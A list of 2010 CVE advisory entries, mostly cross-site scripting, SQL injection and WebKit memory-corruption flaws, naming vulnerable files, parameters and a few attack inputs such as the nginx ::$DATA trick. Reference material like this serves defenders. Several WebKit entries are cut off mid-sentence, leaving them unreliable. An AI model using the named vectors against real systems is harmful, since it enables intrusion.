[CVE-2010-2265] Cross-site scripting (XSS) vulnerability in the GetServerName function in sysinfo/commonFunc.js in Microsoft Windows Help and Support Center for Windows XP and Windows Server 2003 allows remote attackers to inject arbitrary web script or HTML via the svr parameter to sysinfo/sysinfomain.htm. NOTE: this can be leveraged with CVE-2010-1885 to execute arbitrary commands without user interaction.
[CVE-2010-2264] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document.
[CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI.
[CVE-2010-2262] Galileo Students Team Weborf before 0.12.1 allows remote attackers to cause a denial of service (crash) via a crafted Range header.
[CVE-2010-2260] Multiple cross-site scripting (XSS) vulnerabilities in Gambit Design Bandwidth Meter, 0.72 and possibly 1.2, allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) view_by_name.php or (2) view_by_ip.php in admin/. NOTE: some sources report that the affected product is ShaPlus Bandwidth Meter, but this is incorrect.
[CVE-2010-2258] Cross-site scripting (XSS) vulnerability in signupconfirm.php in phpBannerExchange 1.2 Arabic allows remote attackers to inject arbitrary web script or HTML via the bannerurl parameter.
[CVE-2010-2256] Multiple cross-site scripting (XSS) vulnerabilities in Pay Per Minute Video Chat Script 2.0 and 2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/memberviewdetails.php and the (2) model parameter to videos.php.
[CVE-2010-2230] The KSES text cleaning filter in lib/weblib.php in Moodle before 1.8.13 and 1.9.x before 1.9.9 does not properly handle vbscript URIs, which allows remote authenticated users to conduct cross-site scripting (XSS) attacks via HTML input.
[CVE-2010-2229] Multiple cross-site scripting (XSS) vulnerabilities in blog/index.php in Moodle before 1.8.13 and 1.9.x before 1.9.9 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2010-2193] Multiple unspecified vulnerabilities in the CA (1) PSFormX and (2) WebScan ActiveX controls, as distributed on the CA Global Advisor web site until May 2009, allow remote attackers to execute arbitrary code via unknown vectors.
[CVE-2010-2179] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, when Firefox or Chrome is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to URL parsing.
[CVE-2010-2158] Multiple cross-site scripting (XSS) vulnerabilities in the Storm module 5.x and 6.x before 6.x-1.33 for Drupal allow remote authenticated users, with certain module privileges, to inject arbitrary web script or HTML via the (1) fullname, (2) phone, or (3) im parameter in a stormperson action to index.php. NOTE: the provenance of this information is unknown
[CVE-2010-2155] Multiple cross-site scripting (XSS) vulnerabilities in zc/publisher/html.rb in ZoneCheck 2.1.0 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) xmlnode.value, (2) zc-error text, (3) $zc_version, (4) domainname in a zc-title row, different vulnerabilities than CVE-2009-4882.
[CVE-2010-2154] Cross-site scripting (XSS) vulnerability in the Search Site in CMScout 2.09, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the search parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-2150] Cross-site scripting (XSS) vulnerability in Fujitsu e-Pares V01 L01 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-2149] Session fixation vulnerability in Fujitsu e-Pares V01 L01, L03, L10, L20, L30 allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2010-2147] Cross-site scripting (XSS) vulnerability in the My Car (com_mycar) component 1.0 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the modveh parameter to index.php.
[CVE-2010-2144] Cross-site scripting (XSS) vulnerability in signinform.php in Zeeways eBay Clone Auction Script allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-2141] SQL injection vulnerability in index.php in NITRO Web Gallery allows remote attackers to execute arbitrary SQL commands via the PictureId parameter in an open action.
[CVE-2010-2130] Cross-site scripting (XSS) vulnerability in wflogin.jsp in Aris Global ARISg 5.0 allows remote attackers to inject arbitrary web script or HTML via the errmsg parameter.
[CVE-2010-2125] Multiple cross-site scripting (XSS) vulnerabilities in the Rotor Banner module 5.x before 5.x-1.8 and 6.x before 6.x-2.5 for Drupal allow remote authenticated users, with "create rotor item" or "edit any rotor item" privileges, to inject arbitrary web script or HTML via the (1) srs, (2) title, or (3) alt image attribute.
[CVE-2010-2123] Multiple cross-site scripting (XSS) vulnerabilities in the Storm module 5.x and 6.x before 6.x-1.33 for Drupal allow remote authenticated users, with certain module privileges, to inject arbitrary web script or HTML via the (1) fullname, (2) address, (3) city, (4) provstate (aka state), (5) phone, or (6) taxid parameter in a stormorganization action to index.php.
[CVE-2010-2114] Cross-site request forgery (CSRF) vulnerability in pbx/gate in Brekeke PBX 2.4.4.8 allows remote attackers to hijack the authentication of users for requests that change passwords via the pbxadmin.web.PbxUserEdit bean.
[CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-2102] Buffer overflow in Webby Webserver 1.01 allows remote attackers to execute arbitrary code via a long HTTP GET request.
[CVE-2010-2091] Microsoft Outlook Web Access (OWA) 8.2.254.0, when Internet Explorer 7 on Windows Server 2003 is used, does not properly handle the id parameter in a Folder IPF.Note action to the default URI, which might allow remote attackers to obtain sensitive information or conduct cross-site scripting (XSS) attacks via an invalid value.
[CVE-2010-2087] Oracle Mojarra 1.2_14 and 2.0.2, as used in IBM WebSphere Application Server, Caucho Resin, and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
[CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
[CVE-2010-2080] Multiple cross-site scripting (XSS) vulnerabilities in Open Ticket Request System (OTRS) 2.3.x before 2.3.6 and 2.4.x before 2.4.8 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-2079] DataTrack System 3.5 allows remote attackers to bypass intended restrictions on file extensions, and read arbitrary files, via a trailing backslash in a URI, as demonstrated by (1) web.config\ and (2) .ascx\ files.
[CVE-2010-2049] Cross-site scripting (XSS) vulnerability in jsp/audit/reports/ExportReport.jsp in ManageEngine ADAudit Plus 4.0.0 build 4043 allows remote attackers to inject arbitrary web script or HTML via the reportList parameter. NOTE: the provenance of this information is unknown.
[CVE-2010-2048] Multiple cross-site scripting (XSS) vulnerabilities in the Heartbeat module 6.x before 6.x-4.9 for Drupal allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-2046] Multiple cross-site scripting (XSS) vulnerabilities in the ActiveHelper LiveHelp (com_activehelper_livehelp) component 2.0.3 for Joomla! allow remote attackers to inject arbitrary web script or HTML via (1) the DOMAINID parameter to server/cookies.php or (2) the SERVER parameter to server/index.php.
[CVE-2010-2043] Cross-site scripting (XSS) vulnerability in Home.aspx in DataTrack System 3.5 and 3.5.8019.4 allows remote attackers to inject arbitrary web script or HTML via the Work_Order_Summary parameter (aka the request summary). NOTE: some of these details are obtained from third party information.
[CVE-2010-2041] Multiple cross-site scripting (XSS) vulnerabilities in index.php in PHP-Calendar before 2.0 Beta7 allow remote attackers to inject arbitrary web script or HTML via the (1) description and (2) lastaction parameters.
[CVE-2010-2040] Cross-site scripting (XSS) vulnerability in search.php in V-EVA Shopzilla Affiliate Script PHP allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2010-2038] Cross-site scripting (XSS) vulnerability in include/tool/editing_files.php in gpEasy CMS 1.6.2 allows remote authenticated users, with Edit privileges, to inject arbitrary web script or HTML via the gpcontent parameter to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2010-2032] Multiple cross-site scripting (XSS) vulnerabilities in resin-admin/digest.php in Caucho Technology Resin Professional 3.1.5, 3.1.10, 4.0.6, and possibly other versions allow remote attackers to inject arbitrary web script or HTML via the (1) digest_realm or (2) digest_username parameters. NOTE: some of these details are obtained from third party information.
[CVE-2010-2031] KAVSafe.sys 2010.4.14.609 and earlier, as used in Kingsoft Webshield 3.5.1.2 and earlier, allows local users to overwrite arbitrary kernel memory via a crafted request to IOCTL 0x830020d4 on the KAVSafe device.
[CVE-2010-2030] Cross-site scripting (XSS) vulnerability in the External Link Page module 5.x before 5.x-1.0 and 6.x before 6.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors related to the administration and redirect pages.
[CVE-2010-2021] Open redirect vulnerability in the Global Redirect module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.4 for Drupal, when non-clean to clean is enabled, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the q parameter.
[CVE-2010-2017] Cross-site scripting (XSS) vulnerability in hasil-pencarian.html in Lokomedia CMS 1.4.1 and 2.0 allows remote attackers to inject arbitrary web script or HTML via the kata parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-2014] Cross-site scripting (XSS) vulnerability in cp/list_content.php in LiSK CMS 4.4 allows remote attackers to inject arbitrary web script or HTML via the cl or possibly id parameter.
[CVE-2010-2013] Cross-site scripting (XSS) vulnerability in cp/edit_email.php in LiSK CMS 4.4 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2010-2010] Multiple cross-site scripting (XSS) vulnerabilities in the Chaos Tool Suite (aka CTools) module 6.x before 6.x-1.4 for Drupal allow remote attackers to inject arbitrary web script or HTML via a node title.
[CVE-2010-2003] Cross-site scripting (XSS) vulnerability in misc/get_admin.php in Advanced Poll 2.08 allows remote attackers to inject arbitrary web script or HTML via the mysql_host parameter.
[CVE-2010-2002] Cross-site scripting (XSS) vulnerability in the Wordfilter module 5.x before 5.x-1.1 and 6.x before 6.x-1.1 for Drupal allows remote authenticated users, with "administer words filtered" privileges, to inject arbitrary web script or HTML via the word list.
[CVE-2010-2001] Cross-site scripting (XSS) vulnerability in the CiviRegister module before 6.x-1.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via the URI.
[CVE-2010-2000] Cross-site scripting (XSS) vulnerability in the Bibliography (Biblio) module 5.x through 5.x-1.17 and 6.x through 6.x-1.9 for Drupal allows remote authenticated users, with "administer biblio" privileges, to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2010-1358.
[CVE-2010-1998] Cross-site scripting (XSS) vulnerability in the CCK TableField module 6.x before 6.x-1.2 for Drupal allows remote authenticated users, with certain node creation or editing privileges, to inject arbitrary web script or HTML via table headers.
[CVE-2010-1997] Cross-site scripting (XSS) vulnerability in admin/edit.php in Saurus CMS 4.7.0 allows remote authenticated users, with "Article list" edit privileges, to inject arbitrary web script or HTML via the pealkiri parameter.
[CVE-2010-1996] Multiple cross-site scripting (XSS) vulnerabilities in index.php in TomatoCMS before 2.0.5 allow remote authenticated users, with certain creation privileges, to inject arbitrary web script or HTML via the (1) content parameter in conjunction with a /admin/poll/add PATH_INFO, the (2) meta parameter in conjunction with a /admin/category/add PATH_INFO, and the (3) keyword parameter in conjunction with a /admin/tag/add PATH_INFO.
[CVE-2010-1995] Multiple cross-site scripting (XSS) vulnerabilities in index.php in TomatoCMS before 2.0.5 allow remote authenticated users, with "Add new article" privileges, to inject arbitrary web script or HTML via the (1) title, (2) subTitle, and (3) author parameters in conjunction with a /admin/news/article/add PATH_INFO.
[CVE-2010-1984] Cross-site scripting (XSS) vulnerability in the Taxonomy Breadcrumb module 5.x before 5.x-1.5 and 6.x before 6.x-1.1 for Drupal allows remote authenticated users, with administer taxonomy permissions, to inject arbitrary web script or HTML via the taxonomy term name in a Breadcrumb display.
[CVE-2010-1976] Cross-site scripting (XSS) vulnerability in the Taxonomy Breadcrumb module 6.x before 6.x-1.1 for Drupal allows remote authenticated users, with administer taxonomy permissions, to inject arbitrary web script or HTML via the node title in a Breadcrumb display.
[CVE-2010-1972] The default configuration of HP Client Automation (HPCA) Enterprise Infrastructure (aka Radia) allows remote attackers to read log files, and consequently cause a denial of service or have unspecified other impact, via web requests.
[CVE-2010-1969] Cross-site scripting (XSS) vulnerability in HP Virtual Connect Enterprise Manager for Windows before 6.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2010-1964] Buffer overflow in ovwebsnmpsrv.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via unspecified parameters to jovgraph.exe, aka ZDI-CAN-683.
[CVE-2010-1963] Cross-site scripting (XSS) vulnerability in HP ServiceCenter allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1961] Buffer overflow in ovutil.dll in ovwebsnmpsrv.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via unspecified variables to jovgraph.exe, which are not properly handled in a call to the sprintf function.
[CVE-2010-1960] Buffer overflow in the error handling functionality in ovwebsnmpsrv.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via a long, invalid option to jovgraph.exe.
[CVE-2010-1958] Cross-site scripting (XSS) vulnerability in the FileField module 5.x before 5.x-2.5 and 6.x before 6.x-3.4 for Drupal allows remote authenticated users, with create or edit permissions and 'Path to File' or 'URL to File' display enabled, to inject arbitrary web script or HTML via the file name (filepath parameter).
[CVE-2010-1941] Unspecified vulnerability in NEC WebSAM DeploymentManager 5.13 and earlier, as used in SigmaSystemCenter 2.1 Update2 and earlier, BladeSystemCenter, ExpressSystemCenter, and VirtualPCCenter 2.2 and earlier, allows remote attackers to cause a denial of service (OS shutdown or restart) via unknown vectors related to Client Service for DPM and crafted packets to port 56010.
[CVE-2010-1940] Apple Safari 4.0.5 on Windows sends the "Authorization: Basic" header appropriate for one web site to a different web site named in a Location header received from the first site, which allows remote web servers to obtain sensitive information by logging HTTP requests. NOTE: the provenance of this information is unknown.
[CVE-2010-1930] Off-by-one error in Novell iManager 2.7, 2.7.3, and 2.7.3 FTF2 allows remote attackers to cause a denial of service (daemon crash) via a long tree parameter in a login request to nps/servlet/webacc.
[CVE-2010-1929] Multiple stack-based buffer overflows in the jclient._Java_novell_jclient_JClient_defineClass@20 function in jclient.dll in the Tomcat web server in Novell iManager 2.7, 2.7.3, and 2.7.3 FTF2 allow remote authenticated users to execute arbitrary code via the (1) EnteredClassID or (2) NewClassName parameter to nps/servlet/webacc.
[CVE-2010-1924] SQL injection vulnerability in index.php in Hi Web Wiesbaden Live Shopping Multi Portal System allows remote attackers to execute arbitrary SQL commands via the artikel parameter.
[CVE-2010-1923] SQL injection vulnerability in user.php in Hi Web Wiesbaden Web 2.0 Social Network Freunde Community System allows remote attackers to execute arbitrary SQL commands via the id parameter in a showgallery action.
[CVE-2010-1905] Multiple cross-site scripting (XSS) vulnerabilities in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance allow remote attackers to inject arbitrary web script or HTML via crafted input to ASP pages, as demonstrated using the backurl parameter to sdccommon/verify/asp/n6plugindestructor.asp.
[CVE-2010-1898] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP1, 2.0 SP2, 3.5, 3.5 SP1, and 3.5.1, and Microsoft Silverlight 2 and 3 before 3.0.50611.0 on Windows and before 3.0.41130.0 on Mac OS X, does not properly handle interfaces and delegations to virtual methods, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Virtual Method Delegate Vulnerability."
[CVE-2010-1872] Cross-site scripting (XSS) vulnerability in cPlayer.php in FlashCard 2.6.5 and 3.0.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-1856] Cross-site scripting (XSS) vulnerability in index.php in RepairShop2 1.9.023 Trial, when magic_quotes_gpc is disabled, allows remote attackers to inject arbitrary web script or HTML via the prod parameter in a products.details action.
[CVE-2010-1854] Cross-site scripting (XSS) vulnerability in auktion.php in Pay Per Watch & Bid Auktions System allows remote attackers to inject arbitrary web script or HTML via the id_auk parameter, which is not properly handled in a forced SQL error message. NOTE: the provenance of this information is unknown.
[CVE-2010-1852] Microsoft Internet Explorer, when the Invisible Hand extension is enabled, uses cookies during background HTTP requests in a possibly unexpected manner, which might allow remote web servers to identify specific persons and their product searches via HTTP request logging, related to a "cross-site data leakage" issue.
[CVE-2010-1851] Google Chrome, when the Invisible Hand extension is enabled, uses cookies during background HTTP requests in a possibly unexpected manner, which might allow remote web servers to identify specific persons and their product searches via HTTP request logging, related to a "cross-site data leakage" issue.
[CVE-2010-1834] CFNetwork in Apple Mac OS X 10.6.x before 10.6.5 does not properly validate the domains of cookies, which makes it easier for remote web servers to track users by setting a cookie that is associated with a partial IP address.
[CVE-2010-1825] Use-after-free vulnerability in WebKit, as used in Google Chrome before 6.0.472.59, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to nested SVG elements.
[CVE-2010-1824] Use-after-free vulnerability in WebKit, as used in Apple iTunes before 10.2 on Windows, Apple Safari, and Google Chrome before 6.0.472.59, allows remote attackers to execute arbitrary code or cause a denial of service via vectors related to SVG styles, the DOM tree, and error messages.
[CVE-2010-1823] Use-after-free vulnerability in WebKit before r65958, as used in Google Chrome before 6.0.472.59, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger use of document APIs such as document.close during parsing, as demonstrated by a Cascading Style Sheets (CSS) file referencing an invalid SVG font, aka rdar problem 8442098.
[CVE-2010-1822] WebKit, as used in Apple Safari before 4.1.3 and 5.0.x before 5.0.3 and Google Chrome before 6.0.472.62, does not properly perform a cast of an unspecified variable, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an SVG element in a non-SVG document.
[CVE-2010-1815] Use-after-free vulnerability in WebKit in Apple iOS before 4.1 on the iPhone and iPod touch, and webkitgtk before 1.2.6, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving scrollbars.
[CVE-2010-1814] WebKit in Apple iOS before 4.1 on the iPhone and iPod touch, and webkitgtk before 1.2.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors involving form menus.
[CVE-2010-1813] WebKit in Apple iOS before 4.1 on the iPhone and iPod touch allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors involving HTML object outlines.
[CVE-2010-1812] Use-after-free vulnerability in WebKit in Apple iOS before 4.1 on the iPhone and iPod touch, and webkitgtk before 1.2.6, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving selections.
[CVE-2010-1807] WebKit in Apple Safari 4.x before 4.1.2 and 5.x before 5.0.2
[CVE-2010-1794] The webdav_mount function in webdav_vfsops.c in the WebDAV kernel extension (aka webdav_fs.kext) for Mac OS X 10.6 allows local users to cause a denial of service (panic) via a mount request with a large integer in the pa_socket_namelen field.
[CVE-2010-1793] Multiple use-after-free vulnerabilities in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4
[CVE-2010-1792] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4
[CVE-2010-1791] Integer signedness error in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving a JavaScript array index.
[CVE-2010-1790] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4
[CVE-2010-1789] Heap-based buffer overflow in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a JavaScript string object.
[CVE-2010-1788] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4
[CVE-2010-1787] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4
[CVE-2010-1786] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4
[CVE-2010-1785] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4
[CVE-2010-1784] The counters functionality in the Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4
[CVE-2010-1783] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4
[CVE-2010-1782] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4
[CVE-2010-1781] Double free vulnerability in WebKit in Apple iOS before 4.1 on the iPhone and iPod touch allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the rendering of an inline element.
[CVE-2010-1780] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4
[CVE-2010-1778] Cross-site scripting (XSS) vulnerability in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via an RSS feed.
[CVE-2010-1774] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses out-of-bounds memory during processing of HTML tables, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document.
[CVE-2010-1773] Off-by-one error in the toAlphabetic function in rendering/RenderListMarker.cpp in WebCore in WebKit before r59950, as used in Google Chrome before 5.0.375.70, allows remote attackers to obtain sensitive information, cause a denial of service (memory corruption and application crash), or possibly execute arbitrary code via vectors related to list markers for HTML lists, aka rdar problem 8009118.
[CVE-2010-1772] Use-after-free vulnerability in page/Geolocation.cpp in WebCore in WebKit before r59859, as used in Google Chrome before 5.0.375.70, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site, related to failure to stop timers associated with geolocation upon deletion of a document.
[CVE-2010-1771] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving fonts.
[CVE-2010-1770] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Apple Safari before 4.1 on Mac OS X 10.4, and Google Chrome before 5.0.375.70 does not properly handle a transformation of a text node that has the IBM1147 character set, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document containing a BR element, related to a "type checking issue."
[CVE-2010-1769] WebKit in Apple iTunes before 9.2 on Windows, and Apple iOS before 4 on the iPhone and iPod touch, accesses out-of-bounds memory during the handling of tables, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, a different vulnerability than CVE-2010-1387 and CVE-2010-1763.
[CVE-2010-1767] Cross-site request forgery (CSRF) vulnerability in loader/DocumentThreadableLoader.cpp in WebCore in WebKit before r57041, as used in Google Chrome before 4.1.249.1059, allows remote attackers to hijack the authentication of unspecified victims via a crafted synchronous preflight XMLHttpRequest operation.
[CVE-2010-1766] Off-by-one error in the WebSocketHandshake::readServerHandshake function in websockets/WebSocketHandshake.cpp in WebCore in WebKit before r56380, as used in Qt and other products, allows remote websockets servers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an upgrade header that is long and invalid.
[CVE-2010-1764] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, follows multiple redirections during form submission, which allows remote web servers to obtain sensitive information by recording the form data.
[CVE-2010-1763] Unspecified vulnerability in WebKit in Apple iTunes before 9.2 on Windows has unknown impact and attack vectors, a different vulnerability than CVE-2010-1387 and CVE-2010-1769.
[CVE-2010-1762] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving HTML in a TEXTAREA element.
[CVE-2010-1761] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving HTML document subtrees.
[CVE-2010-1760] loader/DocumentThreadableLoader.cpp in the XMLHttpRequest implementation in WebCore in WebKit before r58409 does not properly handle credentials during a cross-origin synchronous request, which has unspecified impact and remote attack vectors, aka rdar problem 7905150.
[CVE-2010-1759] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the Node.normalize method.
[CVE-2010-1758] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving DOM Range objects.
[CVE-2010-1755] Safari in Apple iOS before 4 on the iPhone and iPod touch does not properly implement the Accept Cookies preference, which makes it easier for remote web servers to track users via a cookie.
[CVE-2010-1749] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the Cascading Style Sheets (CSS) run-in property and multiple invocations of a destructor for a child element that has been referenced multiple times.
[CVE-2010-1746] Multiple cross-site scripting (XSS) vulnerabilities in the Table JX (com_grid) component for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) data_search and (2) rpp parameters to index.php.
[CVE-2010-1742] Cross-site scripting (XSS) vulnerability in projects.php in Scratcher allows remote attackers to inject arbitrary web script or HTML via the show parameter.
[CVE-2010-1736] KrM Haber 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for d_atabase/Krmdb.mdb.
[CVE-2010-1729] WebKit.dll in WebKit, as used in Safari.exe 4.531.9.1 in Apple Safari, allows remote attackers to cause a denial of service (application crash) via JavaScript that writes <marquee> sequences in an infinite loop.
[CVE-2010-1724] Multiple cross-site scripting (XSS) vulnerabilities in Zikula Application Framework 1.2.2, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) func parameter to index.php, or the (2) lang parameter to index.php, which is not properly handled by ZLanguage.php.
[CVE-2010-1712] Multiple cross-site scripting (XSS) vulnerabilities in base/Comments.php in Webmobo WB News 2.3.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name and possibly (2) message parameters. NOTE: some of these details are obtained from third party information.
[CVE-2010-1711] Cross-site scripting (XSS) vulnerability in carga_foto_al.php in Siestta 2.0, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the usuario parameter.
[CVE-2010-1709] Multiple cross-site scripting (XSS) vulnerabilities in upload.cgi in G5-Scripts Auto-Img-Gallery 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) user and (2) pass parameters.
[CVE-2010-1707] Multiple cross-site scripting (XSS) vulnerabilities in register.php in Piwigo 2.0.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) login and (2) mail_address parameters.
[CVE-2010-1703] Multiple cross-site scripting (XSS) vulnerabilities in index_search.php in 2daybiz Polls (aka Advanced Poll) Script allow remote attackers to inject arbitrary web script or HTML via the (1) category parameter or (2) search field.
[CVE-2010-1667] Multiple cross-site scripting (XSS) vulnerabilities in Mahara before 1.0.15, 1.1.x before 1.1.9, and 1.2.x before 1.2.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1662] Cross-site scripting (XSS) vulnerability in acpmoderate.php in PHP-Quick-Arcade (PHPQA) 3.0.21 allows remote attackers to inject arbitrary web script or HTML via the serv parameter.
[CVE-2010-1655] Cross-site scripting (XSS) vulnerability in User/User_ChkLogin.asp in PowerEasy 2006 and PowerEasy SiteWeaver 6.8 allows remote attackers to inject arbitrary web script or HTML via the ComeUrl parameter.
[CVE-2010-1651] IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.31 and 7.0.x before 7.0.0.11, when Basic authentication and SIP tracing (aka full trace logging for SIP) are enabled, logs the entirety of all inbound and outbound SIP messages, which allows local users to obtain sensitive information by reading the trace log.
[CVE-2010-1650] IBM WebSphere Application Server (WAS) 6.0.x before 6.0.2.41, 6.1.x before 6.1.0.31, and 7.0.x before 7.0.0.11, when the -trace option (aka debugging mode) is enabled, executes debugging statements that print string representations of unspecified objects, which allows attackers to obtain sensitive information by reading the trace output.
